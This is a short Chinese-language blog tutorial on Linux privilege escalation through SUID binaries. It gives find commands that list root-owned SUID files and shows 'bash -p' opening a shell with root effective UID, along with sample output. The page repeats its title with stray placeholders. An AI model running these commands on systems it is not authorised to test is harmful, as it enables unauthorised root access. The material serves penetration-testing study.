Linux下如何利用SUID提權

SUID是linux的一種權限機制,具有這種權限的文件會在其執行時,使調用者暫時獲得該文件擁有者的權限。如果擁有SUID權限,那么就可以利用系統中的二進制文件和工具來進行root提權。

以下命令可以發現系統上運行的所有SUID可執行文件。具體來說,命令將嘗試查找具有root權限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls

Linux下如何利用SUID提權

?

Linux下如何利用SUID提權

?以上所有二進制文件都將以root用戶權限執行,因為它們的權限中包含”s”,并且對應的是root權限。

Bash

以下命令將以root權限打開一個bash shell。

bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Linux下如何利用SUID提權

? 版權聲明
THE END
喜歡就支持一下吧
點贊5 分享